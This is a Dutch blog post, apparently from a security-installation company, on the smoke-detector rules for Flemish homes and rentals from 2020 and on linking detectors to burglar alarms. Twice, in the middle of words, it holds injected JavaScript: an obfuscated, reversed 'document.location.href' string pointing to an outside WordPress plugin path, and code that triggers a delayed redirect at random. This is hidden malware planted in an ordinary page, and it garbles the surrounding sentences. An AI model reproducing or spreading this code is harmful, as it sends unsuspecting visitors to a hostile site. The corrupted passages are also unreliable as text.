Rookmelders zijn al een tijdje verplicht voor nieuwbouwwoningen. Nu heeft de Vlaamse regering de regelgeving rond rookmelders nog verstrengd. Vanaf januari 2020 zijn rookmelders ook verplicht in elke Vlaamse (huur)woning en studentenkamers. Waarom? Om de kans op woningbranden te verkleinen en te zorgen dat iedereen zich veilig voelt in huis. Hoog tijd om het nut van een rookmelder, brandbeveiliging en zelfs inbraakinstallaties te verduidelijken.

 

Waarom zijn rookmelders zo belangrijk?

Rookmelders nemen de functie van je neus over. Zeker ‘s nachts is dat een lifesaver. Want als er ‘s nachts brand uitbreekt, heb je maar een kleine kans om op tijd wakker te worden en een brand te overleven. Dat komt omdat je neus zich ‘s nachts uitschakelt. Gevolg: de verstikkende rook kan zich snel verspreiden. De oplossing? Investeren in voldoende rookmelders.

 

Sluit je rookmelder aan op je inbraakalarminstallatie

Wist je dat je rookdetectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren perfect kan aansluiten op een bestaande inbraakalarminstallatie? Het grote voordeel? Een duidelijker alarmsignaal. De melding van een brand gebeurt via de (bestaande) app en de meldkamer.

De basis van een goede brandbeveiliging is om op elke verdieping van je woning minstens één rookmelder te hangen. Je rookmelders aansluiten op je bestaande inbraakinstallatie zorgt voor extra veiligheid. Die rookmelders zijn misschien iets duurder in aankoop, maar ze brengen gegarandeerd op.

 

Ben je verplicht om rookmelders te hangen?

In nieuwbouwwoningen is het plaatsen van rookmelders al langer verplicht. Maar op 10 maart 2017 heeft de Vlaamse Regering de regelgeving rond rookmelders verstrengd. Gevolg: vanaf 1 januari 2020 zijn rookmelders verplicht in alle Vlaamse (huur)woningen en studentenkamers. Dus vanaf 2020 is er geen weg meer terug en hang je best rookmelders. Zo ben je altijd veilig in je huis en in orde volgens de wet. 

 

Wat zijn de gevolgen als je geen rookmelder hangt?

Als je woning niet voldoet aan de nieuwe regelgeving rond rookmelders, wordt ze beschouwd als ‘niet-conform’. Dat wil zeggen dat als een verhuurder voor die woning een conformiteitsattest aanvraagt, zal hem dit geweigerd worden. Bovendien kunnen er sancties aan verbonden worden zoals: verplichting om werken uit te voeren, herbestemming, sloop, enz.

Wat dan langs administratieve kant? Er kan een woningcontroleur langskomen en die zal enkel een opmerking maken op het technisch verslag van het onderzoek. Weet dat als je geen of onvoldoende rookmelders hebt hangen, dit niet zal leiden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een ongeschikt- en/of onbewoonbaarheidsbesluit.

 

rookmelder-varel

 

Waar moet je rookmelders hangen?

Vanaf januari 2020 ben je verplicht om op elke bouwlaag een rookmelder te bevestigen. Graag adviseert de Varel Security expert waar je het best rookmelders plaatst. Voor een afspraak kan je terecht op altijd bij een Varel Security specialist terecht.

Leuke extra: We hebben ook een app waar de rookmelders kunnen communiceren. D.w.z. waar je ook bent kan je een melding ontvangen als er zich een noodsituatie voordoet.

 

Contacteer ons!